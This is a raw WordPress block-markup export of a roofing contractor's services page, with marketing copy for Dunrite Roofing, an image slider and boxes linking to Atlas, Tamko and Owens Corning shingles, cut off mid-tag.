style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":33,\"rightPadding\":35,\"rightPaddingTablet\":20,\"blockId\":\"5bb0eb53-4142-4c56-a9da-ddac15427577\"} -->\n<style type=\"text/css\"> .block-5bb0eb53-4142-4c56-a9da-ddac15427577 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-5bb0eb53-4142-4c56-a9da-ddac15427577 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-5bb0eb53-4142-4c56-a9da-ddac15427577 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 35px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-5bb0eb53-4142-4c56-a9da-ddac15427577 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 20px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-5bb0eb53-4142-4c56-a9da-ddac15427577 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-5bb0eb53-4142-4c56-a9da-ddac15427577\" style=\"width:33%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:shortcode -->\n[footermenu menu=\"Services\"]\n<!-- /wp:shortcode --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"width\":67,\"topPaddingMobile\":40,\"blockId\":\"3bac4046-8d50-4568-a704-3d0a1309220e\"} -->\n<style type=\"text/css\"> .block-3bac4046-8d50-4568-a704-3d0a1309220e .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-3bac4046-8d50-4568-a704-3d0a1309220e .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-3bac4046-8d50-4568-a704-3d0a1309220e .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-3bac4046-8d50-4568-a704-3d0a1309220e .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-3bac4046-8d50-4568-a704-3d0a1309220e .skt-blocks-block-column{\n padding-top: 40px; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-3bac4046-8d50-4568-a704-3d0a1309220e\" style=\"width:67%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:heading {\"level\":3} -->\n<h3>EXPERIENCE THE DUNRITE DIFFERENCE</h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Dunrite Roofing has been working hard for three generations to provide you our ultimate goal:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>100% customer satisfaction. Locally owned and operated for 25+ years, contact us today for a free estimate and see why so many of your neighbors and friends refer Dunrite.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:skt-blocks/advance-columns {\"columns\":1,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"1e15d182-2fe0-4c40-80ac-07eac231b55f\"} -->\n<style type=\"text/css\"> .block-1e15d182-2fe0-4c40-80ac-07eac231b55f .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-1e15d182-2fe0-4c40-80ac-07eac231b55f .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-1e15d182-2fe0-4c40-80ac-07eac231b55f .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-1e15d182-2fe0-4c40-80ac-07eac231b55f .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-1e15d182-2fe0-4c40-80ac-07eac231b55f .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-1e15d182-2fe0-4c40-80ac-07eac231b55f .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-1e15d182-2fe0-4c40-80ac-07eac231b55f .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-1e15d182-2fe0-4c40-80ac-07eac231b55f skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-1\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":100,\"topPadding\":30,\"bottomPadding\":30,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"topPaddingMobile\":30,\"bottomPaddingMobile\":30,\"blockId\":\"11f54df8-ed12-474d-af0a-c624bd1b75bd\"} -->\n<style type=\"text/css\"> .block-11f54df8-ed12-474d-af0a-c624bd1b75bd .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-11f54df8-ed12-474d-af0a-c624bd1b75bd .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-11f54df8-ed12-474d-af0a-c624bd1b75bd .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-11f54df8-ed12-474d-af0a-c624bd1b75bd .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-11f54df8-ed12-474d-af0a-c624bd1b75bd .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-11f54df8-ed12-474d-af0a-c624bd1b75bd\" style=\"width:100%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/image-slider {\"gutter\":0,\"gutterMobile\":0,\"lightbox\":true,\"gridSize\":\"xlrg\",\"height\":500,\"autoPlay\":true,\"autoPlaySpeed\":\"3000\",\"borderWidth\":10,\"iconBackgroundRadius\":0,\"iconBackgroundOpacity\":100,\"iconBackgroundColor\":\"#ffffff\",\"borderColor\":\"#0d2e63\",\"iconColor\":\"#012257\",\"borderStyle\":\"solid\",\"counterId\":\"d2f65cb2-10c7-4a79-b25a-de564d91e1c1\"} -->\n<style type=\"text/css\"> .block-id-d2f65cb2-10c7-4a79-b25a-de564d91e1c1 .flickity-button .flickity-button-icon {\n fill: #012257; }\n .skt-blocks-gallery.block-id-d2f65cb2-10c7-4a79-b25a-de564d91e1c1 .flickity-button {\n background-color: rgba(255, 255, 255, 1); border-radius: 0%; }\n .block-id-d2f65cb2-10c7-4a79-b25a-de564d91e1c1 .skt-blocks-gallery--item figure {\n height: 480px; }\n</style><div class=\"\"><div class=\"block-id-d2f65cb2-10c7-4a79-b25a-de564d91e1c1 is-cropped skt-blocks-gallery has-no-alignment has-caption-style-dark has-lightbox\"><div class=\"has-carousel has-carousel-xlrg\" style=\"height:500px\" data-flickity=\"{&quot;autoPlay&quot;:3000,&quot;draggable&quot;:true,&quot;pageDots&quot;:false,&quot;prevNextButtons&quot;:true,&quot;wrapAround&quot;:true,&quot;cellAlign&quot;:&quot;center&quot;,&quot;pauseAutoPlayOnHover&quot;:false,&quot;freeScroll&quot;:false,&quot;arrowShape&quot;:{&quot;x0&quot;:10,&quot;x1&quot;:60,&quot;y1&quot;:50,&quot;x2&quot;:65,&quot;y2&quot;:45,&quot;x3&quot;:20},&quot;thumbnails&quot;:false,&quot;responsiveHeight&quot;:false}\"><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://cteisys.com/wp-content/uploads/2021/05/slider1-1024x597.jpg\" alt=\"\" data-id=\"36\" data-link=\"https://cteisys.com/home/slider1/\" class=\"wp-image-36\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://cteisys.com/wp-content/uploads/2021/05/slider2-1024x597.jpg\" alt=\"\" data-id=\"34\" data-link=\"https://cteisys.com/home/slider2/\" class=\"wp-image-34\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/18033957_1641106155903819_3439710667750671365_n.jpg\" alt=\"\" data-id=\"440\" data-link=\"https://cteisys.com/recent-works/18033957_1641106155903819_3439710667750671365_n/\" class=\"wp-image-440\"/></figure></div></div></div></div>\n<!-- /wp:skt-blocks/image-slider --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns -->\n\n<!-- wp:paragraph -->\n<p>Never worry again with a new roof replacement from Dunrite. With Mike or Justin on every job you can be sure to receive quality that cannot be beat. Whether it is a residential tear off, new construction or the installation of a metal accent roof take a look at some options below.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:skt-blocks/image-boxes-block {\"imageboxesBlock\":[{\"hover_description\":\"You’re Looking For\\u003cbr\\u003eProtection You Deserve\",\"title\":\"Atlas Shingles\",\"cta_url\":\"https://www.atlasroofing.com/roof-shingles\",\"img_id\":484,\"img_url\":{\"id\":484,\"title\":\"atlas roof shingles\",\"filename\":\"atlas-roof-shingles.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2022/08/atlas-roof-shingles.jpg\",\"link\":\"https://cteisys.com/services/roofing-2/atlas-roof-shingles/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"atlas-roof-shingles\",\"status\":\"inherit\",\"uploadedTo\":263,\"date\":\"2022-08-24T23:19:39.000Z\",\"modified\":\"2022-08-24T23:19:39.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://cteisys.com/wp-includes/images/media/default.png\",\"dateFormatted\":\"August 24, 2022\",\"nonces\":{\"update\":\"f4e29dfaf0\",\"delete\":\"cda8092ac3\",\"edit\":\"4d4ab539cc\"},\"editLink\":\"https://cteisys.com/wp-admin/post.php?post=484\\u0026action=edit\",\"meta\":false,\"authorName\":\"newd\",\"authorLink\":\"https://cteisys.com/wp-admin/profile.php\",\"uploadedToTitle\":\"Roofing\",\"uploadedToLink\":\"https://cteisys.com/wp-admin/post.php?post=263\\u0026action=edit\",\"filesizeInBytes\":\"16306\",\"filesizeHumanReadable\":\"16 KB\",\"context\":\"\",\"height\":170,\"width\":306,\"orientation\":\"landscape\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://cteisys.com/wp-content/uploads/2022/08/atlas-roof-shingles-150x150.jpg\",\"orientation\":\"landscape\"},\"medium\":{\"height\":167,\"width\":300,\"url\":\"https://cteisys.com/wp-content/uploads/2022/08/atlas-roof-shingles-300x167.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2022/08/atlas-roof-shingles.jpg\",\"height\":170,\"width\":306,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"},\"smush\":\"\\u003cp class=\\u0022smush-status\\u0022\\u003e3 images reduced by 21.1 KB (60.7%)\\u003cbr /\\u003eImage size: 15.9 KB\\u003c/p\\u003e\\u003cdiv class=\\u0022sui-smush-media smush-status-links\\u0022\\u003e\\u003ca href=\\u0022#\\u0022 class=\\u0022wp-smush-action smush-stats-details wp-smush-title sui-tooltip sui-tooltip-top-right\\u0022 data-tooltip=\\u0022Detailed stats for all the image sizes\\u0022\\u003eView Stats\\u003c/a\\u003e\\u003c/div\\u003e\\u003cdiv id=\\u0022smush-stats-484\\u0022 class=\\u0022sui-smush-media smush-stats-wrapper hidden\\u0022\\u003e\\n\\t\\t\\t\\u003ctable class=\\u0022wp-smush-stats-holder\\u0022\\u003e\\n\\t\\t\\t\\t\\u003cthead\\u003e\\n\\t\\t\\t\\t\\t\\u003ctr\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003cth class=\\u0022smush-stats-header\\u0022\\u003eImage size\\u003c/th\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003cth class=\\u0022smush-stats-header\\u0022\\u003eSavings\\u003c/th\\u003e\\n\\t\\t\\t\\t\\t\\u003c/tr\\u003e\\n\\t\\t\\t\\t\\u003c/thead\\u003e\\n\\t\\t\\t\\t\\u003ctbody\\u003e\\u003ctr\\u003e\\n\\t\\t\\t\\t\\t\\t\\t\\u003ctd\\u003eFULL\\u003c/td\\u003e\\n\\t\\t\\t\\t\\t\\t\\t\\u003ctd class=\\u0022smush-skipped\\u0022\\u003e\\u003ca href=\\u0022https://wpmudev.com/project/wp-smush-pro/?utm_source=smush\\u0026utm_medium=plugin\\u0026utm_campaign=smush_medialibrary_savings\\u0022 target=\\u0022_blank\\u0022\\u003e\\n\\t\\t\\t\\t\\u003cspan class=\\u0022sui-tooltip sui-tooltip-left sui-tooltip-constrained sui-tooltip-top-right-mobile\\u0022 data-tooltip=\\u0022When you upload an image to WordPress it automatically creates 8 thumbnail sizes that are commonly used in your pages. WordPress also stores the original full-size image, but because these are not usually embedded on your site we don’t Smush them. Pro users can override this.\\u0022\\u003e\\n\\t\\t\\t\\t\\u003cspan class=\\u0022sui-tag sui-tag-purple sui-tag-sm\\u0022\\u003ePRO\\u003c/span\\u003e\\u003c/span\\u003e\\u003c/a\\u003e\\u003c/td\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003c/tr\\u003e\\u003ctr\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003ctd\\u003eMEDIUM \\u003cbr /\\u003e (300x167)\\u003c/td\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003ctd\\u003e7.3 KB ( 49.5% )\\u003c/td\\u003e\\n\\t\\t\\t\\t\\t\\u003c/tr\\u003e\\u003ctr\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003ctd\\u003eTHUMBNAIL \\u003cbr /\\u003e (150x150)\\u003c/td\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003ctd\\u003e7.0 KB ( 64.1% )\\u003c/td\\u003e\\n\\t\\t\\t\\t\\t\\u003c/tr\\u003e\\u003ctr\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003ctd\\u003eFOOTERTHUMB \\u003cbr /\\u003e (100x84)\\u003c/td\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003ctd\\u003e6.8 KB ( 74.6% )\\u003c/td\\u003e\\n\\t\\t\\t\\t\\t\\u003c/tr\\u003e\\u003c/tbody\\u003e\\n\\t\\t\\t\\u003c/table\\u003e\\n\\t\\t\\u003c/div\\u003e\"}},{\"title\":\"Tamko Products\",\"cta_url\":\"https://www.tamko.com/\",\"hover_description\":\"Shingles crafted with American Pride\",\"img_id\":486,\"img_url\":{\"id\":486,\"title\":\"tamco\",\"filename\":\"tamco.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2022/08/tamco.jpg\",\"link\":\"https://cteisys.com/services/roofing-2/tamco/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"tamco\",\"status\":\"inherit\",\"uploadedTo\":263,\"date\":\"2022-08-24T23:19:57.000Z\",\"modified\":\"2022-08-24T23:19:57.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://cteisys.com/wp-includes/images/media/default.png\",\"dateFormatted\":\"August 24, 2022\",\"nonces\":{\"update\":\"6acecdcaed\",\"delete\":\"ba51f566bc\",\"edit\":\"906a5258b4\"},\"editLink\":\"https://cteisys.com/wp-admin/post.php?post=486\\u0026action=edit\",\"meta\":false,\"authorName\":\"newd\",\"authorLink\":\"https://cteisys.com/wp-admin/profile.php\",\"uploadedToTitle\":\"Roofing\",\"uploadedToLink\":\"https://cteisys.com/wp-admin/post.php?post=263\\u0026action=edit\",\"filesizeInBytes\":\"18355\",\"filesizeHumanReadable\":\"18 KB\",\"context\":\"\",\"height\":129,\"width\":291,\"orientation\":\"landscape\",\"sizes\":{\"thumbnail\":{\"height\":129,\"width\":150,\"url\":\"https://cteisys.com/wp-content/uploads/2022/08/tamco-150x129.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2022/08/tamco.jpg\",\"height\":129,\"width\":291,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"},\"smush\":\"\\u003cp class=\\u0022smush-status\\u0022\\u003e2 images reduced by 13.9 KB (61.0%)\\u003cbr /\\u003eImage size: 17.9 KB\\u003c/p\\u003e\\u003cdiv class=\\u0022sui-smush-media smush-status-links\\u0022\\u003e\\u003ca href=\\u0022#\\u0022 class=\\u0022wp-smush-action smush-stats-details wp-smush-title sui-tooltip sui-tooltip-top-right\\u0022 data-tooltip=\\u0022Detailed stats for all the image sizes\\u0022\\u003eView Stats\\u003c/a\\u003e\\u003c/div\\u003e\\u003cdiv id=\\u0022smush-stats-486\\u0022 class=\\u0022sui-smush-media smush-stats-wrapper hidden\\u0022\\u003e\\n\\t\\t\\t\\u003ctable class=\\u0022wp-smush-stats-holder\\u0022\\u003e\\n\\t\\t\\t\\t\\u003cthead\\u003e\\n\\t\\t\\t\\t\\t\\u003ctr\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003cth class=\\u0022smush-stats-header\\u0022\\u003eImage size\\u003c/th\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003cth class=\\u0022smush-stats-header\\u0022\\u003eSavings\\u003c/th\\u003e\\n\\t\\t\\t\\t\\t\\u003c/tr\\u003e\\n\\t\\t\\t\\t\\u003c/thead\\u003e\\n\\t\\t\\t\\t\\u003ctbody\\u003e\\u003ctr\\u003e\\n\\t\\t\\t\\t\\t\\t\\t\\u003ctd\\u003eFULL\\u003c/td\\u003e\\n\\t\\t\\t\\t\\t\\t\\t\\u003ctd class=\\u0022smush-skipped\\u0022\\u003e\\u003ca href=\\u0022https://wpmudev.com/project/wp-smush-pro/?utm_source=smush\\u0026utm_medium=plugin\\u0026utm_campaign=smush_medialibrary_savings\\u0022 target=\\u0022_blank\\u0022\\u003e\\n\\t\\t\\t\\t\\u003cspan class=\\u0022sui-tooltip sui-tooltip-left sui-tooltip-constrained sui-tooltip-top-right-mobile\\u0022 data-tooltip=\\u0022When you upload an image to WordPress it automatically creates 8 thumbnail sizes that are commonly used in your pages. WordPress also stores the original full-size image, but because these are not usually embedded on your site we don’t Smush them. Pro users can override this.\\u0022\\u003e\\n\\t\\t\\t\\t\\u003cspan class=\\u0022sui-tag sui-tag-purple sui-tag-sm\\u0022\\u003ePRO\\u003c/span\\u003e\\u003c/span\\u003e\\u003c/a\\u003e\\u003c/td\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003c/tr\\u003e\\u003ctr\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003ctd\\u003eTHUMBNAIL \\u003cbr /\\u003e (150x129)\\u003c/td\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003ctd\\u003e7.0 KB ( 55.3% )\\u003c/td\\u003e\\n\\t\\t\\t\\t\\t\\u003c/tr\\u003e\\u003ctr\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003ctd\\u003eFOOTERTHUMB \\u003cbr /\\u003e (100x84)\\u003c/td\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003ctd\\u003e6.9 KB ( 68.2% )\\u003c/td\\u003e\\n\\t\\t\\t\\t\\t\\u003c/tr\\u003e\\u003c/tbody\\u003e\\n\\t\\t\\t\\u003c/table\\u003e\\n\\t\\t\\u003c/div\\u003e\"}}],\"counterId\":\"fc4c35c5-5920-42b0-815e-00e4450fb573\"} -->\n<style type=\"text/css\"> .wp-block-skt-blocks-image-boxes-block-item.block-id-fc4c35c5-5920-42b0-815e-00e4450fb573 .wp-block-skt-blocks-image-boxes-block-item__description, .wp-block-skt-blocks-image-boxes-block-item.block-id-fc4c35c5-5920-42b0-815e-00e4450fb573 .wp-block-skt-blocks-image-boxes-block-item__title {\n color: undefined; }\n .wp-block-skt-blocks-image-boxes-block-item.block-id-fc4c35c5-5920-42b0-815e-00e4450fb573 {\n background-color: undefined; color: undefined; text-align: center; border-radius:undefinedpx; justify-content:center !important; }\n .wp-block-skt-blocks-image-boxes-block-item.block-id-fc4c35c5-5920-42b0-815e-00e4450fb573:hover .skt-blocks-add-image {\n background-image: linear-gradient(180deg,rgba(255, 255, 255, 0.7),rgba(255, 255, 255, 0.7)); border-radius:undefinedpx; }\n .wp-block-skt-blocks-image-boxes-block-item.block-id-fc4c35c5-5920-42b0-815e-00e4450fb573:hover .skt-blocks-imagebox-image-wrap.front {\n transform: scale(undefined); }\n .wp-block-skt-blocks-image-boxes-block-item.block-id-fc4c35c5-5920-42b0-815e-00e4450fb573 .skt-blocks-imagebox-image-wrap.front img {\n width:fullpx !important; max-width:100%; }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.wp-block-skt-blocks-image-boxes-block-item.block-id-fc4c35c5-5920-42b0-815e-00e4450fb573 .wp-block-skt-blocks-image-boxes-block-item__title {\n font-size: undefinedpx; }\n}\n\n@media only screen and (max-width: 976px){\n\n.wp-block-skt-blocks-image-boxes-block-item.block-id-fc4c35c5-5920-42b0-815e-00e4450fb573 .wp-block-skt-blocks-image-boxes-block-item__title {\n font-size: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .wp-block-skt-blocks-image-boxes-block-item.block-id-fc4c35c5-5920-42b0-815e-00e4450fb573 .wp-block-skt-blocks-image-boxes-block-item__title {\n font-size: undefinedpx; }\n}\n</style><div class=\"has-text-align-center\"><div class=\"wp-block-skt-blocks-image-boxes-block__inner has-columns has-2-columns has-responsive-columns has-medium-gutter\"><a href=\"https://www.atlasroofing.com/roof-shingles\"><div class=\"wp-block-skt-blocks-image-boxes-block-item block-id-fc4c35c5-5920-42b0-815e-00e4450fb573\" style=\"background-color:rgba(255, 255, 255, 0.7);background-image:linear-gradient(180deg,rgba(255, 255, 255, 0.7),rgba(255, 255, 255, 0.7)),url(https://cteisys.com/wp-content/uploads/2022/08/atlas-roof-shingles.jpg);padding-left:15px;padding-right:15px;padding-bottom:15px;padding-top:15px;box-shadow:9px 9px 9px 9px undefined \"><div class=\"skt-blocks-add-image\"></div><h3 class=\"wp-block-skt-blocks-image-boxes-block-item__title\">Atlas Shingles</h3><p class=\"wp-block-skt-blocks-image-boxes-block-item__description\">You’re Looking For<br>Protection You Deserve</p></div></a><a href=\"https://www.tamko.com/\"><div class=\"wp-block-skt-blocks-image-boxes-block-item block-id-fc4c35c5-5920-42b0-815e-00e4450fb573\" style=\"background-color:rgba(255, 255, 255, 0.7);background-image:linear-gradient(180deg,rgba(255, 255, 255, 0.7),rgba(255, 255, 255, 0.7)),url(https://cteisys.com/wp-content/uploads/2022/08/tamco.jpg);padding-left:15px;padding-right:15px;padding-bottom:15px;padding-top:15px;box-shadow:9px 9px 9px 9px undefined \"><div class=\"skt-blocks-add-image\"></div><h3 class=\"wp-block-skt-blocks-image-boxes-block-item__title\">Tamko Products</h3><p class=\"wp-block-skt-blocks-image-boxes-block-item__description\">Shingles crafted with American Pride</p></div></a></div></div>\n<!-- /wp:skt-blocks/image-boxes-block -->\n\n<!-- wp:skt-blocks/image-boxes-block {\"imageboxesBlock\":[{\"hover_description\":\"At Owens Corning, we know it’s More Than Just a Roof®.\",\"title\":\"Owens Corning\",\"cta_url\":\"https://www.owenscorning.com/\",\"img_id\":485,\"img_url\":{\"id\":485,\"title\":\"owens corning\",\"filename\":\"owens-corning.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2022/08/owens-corning.jpg\",\"link\":\"https://cteisys.com/services/roofing-2/owens-corning/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"owens-corning\",\"status\":\"inherit\",\"uploadedTo\":263,\"date\":\"2022-08-24T23:19:47.000Z\",\"modified\":\"2022-08-24T23:19:47.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://cteisys.com/wp-includes/images/media/default.png\",\"dateFormatted\":\"August 24, 2022\",\"nonces\":{\"update\":\"94850a2d2b\",\"delete\":\"df3080b8b1\",\"edit\":\"721340def0\"},\"editLink\":\"https://cteisys.com/wp-admin/post.php?post=485\\u0026action=edit\",\"meta\":false,\"authorName\":\"newd\",\"authorLink\":\"https://cteisys.com/wp-admin/profile.php\",\"uploadedToTitle\":\"Roofing\",\"uploadedToLink\":\"https://cteisys.com/wp-admin/post.php?post=263\\u0026action=edit\",\"filesizeInBytes\":\"17085\",\"filesizeHumanReadable\":\"17 KB\",\"context\":\"\",\"height\":98,\"width\":297,\"orientation\":\"landscape\",\"sizes\":{\"thumbnail\":{\"height\":98,\"width\":150,\"url\":\"https://cteisys.com/wp-content/uploads/2022/08/owens-corning-150x98.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2022/08/owens-corning.jpg\",\"height\":98,\"width\":297,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"},\"smush\":\"\\u003cp class=\\u0022smush-status\\u0022\\u003e2 images reduced by 14.0 KB (62.1%)\\u003cbr /\\u003eImage size: 16.7 KB\\u003c/p\\u003e\\u003cdiv class=\\u0022sui-smush-media smush-status-links\\u0022\\u003e\\u003ca href=\\u0022#\\u0022 class=\\u0022wp-smush-action smush-stats-details wp-smush-title sui-tooltip sui-tooltip-top-right\\u0022 data-tooltip=\\u0022Detailed stats for all the image sizes\\u0022\\u003eView Stats\\u003c/a\\u003e\\u003c/div\\u003e\\u003cdiv id=\\u0022smush-stats-485\\u0022 class=\\u0022sui-smush-media smush-stats-wrapper hidden\\u0022\\u003e\\n\\t\\t\\t\\u003ctable class=\\u0022wp-smush-stats-holder\\u0022\\u003e\\n\\t\\t\\t\\t\\u003cthead\\u003e\\n\\t\\t\\t\\t\\t\\u003ctr\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003cth class=\\u0022smush-stats-header\\u0022\\u003eImage size\\u003c/th\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003cth class=\\u0022smush-stats-header\\u0022\\u003eSavings\\u003c/th\\u003e\\n\\t\\t\\t\\t\\t\\u003c/tr\\u003e\\n\\t\\t\\t\\t\\u003c/thead\\u003e\\n\\t\\t\\t\\t\\u003ctbody\\u003e\\u003ctr\\u003e\\n\\t\\t\\t\\t\\t\\t\\t\\u003ctd\\u003eFULL\\u003c/td\\u003e\\n\\t\\t\\t\\t\\t\\t\\t\\u003ctd class=\\u0022smush-skipped\\u0022\\u003e\\u003ca 